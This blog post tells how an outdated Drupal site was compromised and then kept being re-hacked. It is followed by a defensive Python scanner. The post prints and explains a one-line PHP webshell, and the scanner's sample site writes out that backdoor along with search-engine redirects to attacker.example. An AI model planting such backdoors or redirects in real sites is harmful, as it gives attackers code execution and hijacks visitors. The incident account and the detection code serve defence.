What A Hacked Drupal Site Taught Me

It was several months ago. Autumn was getting colder and winter was nearly here. One rainy evening I got a call from a friend asking for some help. His ancient site had somehow been hacked, which was strange, since the site was built on Drupal. We did manage to sort things out, but honestly, those were some lousy days. The previous state of the site was restored quickly, yes, but the problem remained. Through our attempts to restore justice we gained a lot of experience, and that is actually the best thing about the whole story.

Why was it hacked?

We still do not really know why anybody bothered to hack my friend's site. It did not have many visitors. The whole thing had been a training platform for my friend several years earlier and had practically zero commercial value. The site was created about six years ago and was never updated; there seemed to be no reason to, so it was still running Drupal 4.7. The site also did not require users to log in to post pictures or text, which makes keeping it secure that much harder. With that combination, the site was eventually hacked, for reasons unknown.

Hack type

Whenever a user typed the site's correct address into the browser, everything was as smooth as ever: they reached the site, navigated around and did whatever they usually do. No problem there. But if somebody found the site through Google or any other search engine, that link redirected them to the hacker's website. In other words, the malicious code only fired when the visitor arrived from a search engine, so the owner, who typed the address directly, never saw it. The very nature of the hack made it hard to detect. You don't use Google to find your own site, right?

Salvation!

For starters we did some upgrading, and now everything runs on Drupal 7. I won't say much about that part, since it would take a dozen blog posts. That did help. For about two weeks, after which the site was hacked again.
Then we began systematically eliminating every possible threat. We changed the database password, the FTP password and even the Drupal login credentials. We cleaned up the PHP files and the Perl scripts. And every morning we found a freshly hacked site; it was like an actual curse of some sort. And then we found this nasty little PHP file with just one line of code! That was it, victory! For those interested, the line was:

eval(base64_decode($_POST["php"]))

After it was removed, everything went back to stability and cold weather. If you are wondering what that small line of code is capable of, I'll tell you. If you are not, I will still tell you. It reads the value of the POST parameter named php, base64-decodes it and hands the result to eval(), which runs it as PHP on the server. So anyone who knows where the file lives can send a POST request to it with an arbitrary PHP script, base64-encoded, in the php field, and the server will execute it. The base64 wrapper is there so the payload travels as harmless-looking text and does not trip naive filters, and because the code comes from the POST body rather than the URL, it does not even show up in the access log. In short: the hacker is free to run practically any PHP code his black heart desires.

What did we both learn in the end? The site was originally vulnerable because it had not been updated for a long time. After we got it running on Drupal 7 everything went more smoothly and more safely. But upgrading only closed the original hole; it did not remove the back door the attacker had already planted, which is why the site kept getting re-hacked until that file was found. Once it was gone, nothing unusual has happened for quite a while now. The lesson we learned is that keeping older versions is like playing with fire. It may cost far more than updating on time. Good luck, everybody, play nice and stay up-to-date!
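Here is an added example, not code from the original post, of the kind of check that would have found both problems described above (the search-engine-only redirect from the "Hack type" section and the one-line eval() back door) in minutes instead of weeks: a small Python scanner that walks a PHP web root and flags files that execute request-controlled input or redirect based on the Referer header. The mini site it scans (the file names under build_sample_site(), the attacker.example host and the file contents) is constructed for illustration; the patterns are heuristics, not a complete webshell signature set.

```python
"""Scan a Drupal (or any PHP) web root for the one-line eval() back door and
the referer-conditional redirect described in the post.  Added example, not
code from the original post; everything written by build_sample_site() is a
constructed sample."""

import re
import tempfile
from pathlib import Path

SEARCH_ENGINES = re.compile(r"google|bing|yahoo|yandex", re.I)

# Code that executes request-controlled input, e.g. eval(base64_decode($_POST["php"]))
# and its close relatives ($_GET/$_REQUEST/$_COOKIE, assert(), with or without base64).
EXEC_OF_REQUEST_INPUT = re.compile(
    r"\b(?:eval|assert)\s*\(\s*(?:base64_decode\s*\(\s*)?"
    r"\$_(?:POST|GET|REQUEST|COOKIE)\b",
    re.I,
)
# eval() of a hard-coded base64 blob: the payload itself is hidden in the file.
EVAL_BASE64_LITERAL = re.compile(r"\beval\s*\(\s*base64_decode\s*\(\s*['\"]", re.I)
# PHP-side redirect; combined below with a Referer check and a search-engine name.
PHP_REDIRECT = re.compile(r"header\s*\(\s*['\"]Location:", re.I)
# Apache rewrite condition on the Referer header; group 1 is its pattern.
HTACCESS_REFERER_COND = re.compile(r"RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)


def scan_text(text: str, is_htaccess: bool = False) -> list[str]:
    """Return the names of suspicious constructs found in one file's contents."""
    findings = []
    if EXEC_OF_REQUEST_INPUT.search(text):
        findings.append("exec-of-request-input")
    if EVAL_BASE64_LITERAL.search(text):
        findings.append("eval-base64-literal")
    if is_htaccess:
        # Redirect only for visitors coming from a search engine.
        for m in HTACCESS_REFERER_COND.finditer(text):
            if SEARCH_ENGINES.search(m.group(1)):
                findings.append("htaccess-referer-redirect")
                break
    elif "HTTP_REFERER" in text and PHP_REDIRECT.search(text) and SEARCH_ENGINES.search(text):
        findings.append("php-referer-redirect")
    return findings


def scan_tree(root: Path) -> dict[str, list[str]]:
    """Walk a web root; map relative path -> findings for every flagged file."""
    results = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        if path.suffix.lower() not in {".php", ".inc", ".module", ".theme"} and path.name != ".htaccess":
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        findings = scan_text(text, is_htaccess=(path.name == ".htaccess"))
        if findings:
            results[path.relative_to(root).as_posix()] = findings
    return results


def build_sample_site() -> Path:
    """Write a constructed mini web root: one clean file, one one-line back door,
    one PHP referer redirect and one .htaccess referer redirect (all made up)."""
    root = Path(tempfile.mkdtemp(prefix="drupal-scan-"))
    files = {
        "index.php": "<?php\nrequire_once './includes/bootstrap.inc';\ndrupal_bootstrap(DRUPAL_BOOTSTRAP_FULL);\n",
        "includes/cache.php": '<?php eval(base64_decode($_POST["php"])); ?>',
        "sites/all/themes/old/template.php": (
            "<?php\n"
            "if (isset($_SERVER['HTTP_REFERER']) && stripos($_SERVER['HTTP_REFERER'], 'google') !== false) {\n"
            "  header('Location: http://attacker.example/'); exit;\n"
            "}\n"
        ),
        ".htaccess": (
            "RewriteEngine On\n"
            "RewriteCond %{HTTP_REFERER} .*(google|yahoo|bing).* [NC]\n"
            "RewriteRule .* http://attacker.example/ [R=302,L]\n"
        ),
    }
    for rel, content in files.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for rel, hits in scan_tree(site).items():
        print(f"{rel}: {', '.join(hits)}")
```

Run it against the real web root (scan_tree(Path("/var/www/site"))) and review every hit by hand; a legitimate module rarely needs eval() on request data, and a real site almost never wants to redirect search-engine visitors somewhere else. Pattern matching catches the obvious droppings, but the surer check after an incident is to diff the whole tree against a pristine copy of the same Drupal release and treat every file that is not in the release, such as includes/cache.php here, as suspect until proven otherwise.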